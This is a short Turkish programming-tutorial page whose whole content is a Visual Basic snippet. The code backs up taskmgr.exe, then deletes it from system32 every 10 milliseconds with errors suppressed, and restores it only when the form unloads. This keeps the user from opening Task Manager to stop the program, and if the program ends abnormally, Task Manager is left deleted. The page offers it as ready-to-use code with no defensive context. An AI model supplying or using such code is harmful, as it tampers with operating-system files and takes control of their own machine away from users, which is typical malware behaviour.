Üye Kayıt Üye Giriş

VisualBasic Kodları, Makaleleri, Geliştirme Araçları ve Linkleri


 VisualBasic Kodları, Makaleleri, Geliştirme Araçları ve Linkleri


Private Sub Form_Load()
FileCopy "c:\windows\system32\taskmgr.exe", "c:\windows\repair\taskmgr.exe"
'Burada Taskmgr dosyasını yedekledik
Timer1.Interval = 10
End Sub

Private Sub Form_Unload(Cancel As Integer)
FileCopy "c:\windows\repair\taskmgr.exe", "c:\windows\system32\taskmgr.exe"
End Sub

Private Sub Timer1_Timer()
On Local Error Resume Next
Kill "c:\windows\system32\taskmgr.exe"
End Sub

Bilgisayar Dershanesi Ders Sahibi;
Bilgisayar Dershanesi

Yorumlar

Yorum Yapabilmek İçin Üye Girişi Yapmanız Gerekmektedir.

ETİKETLER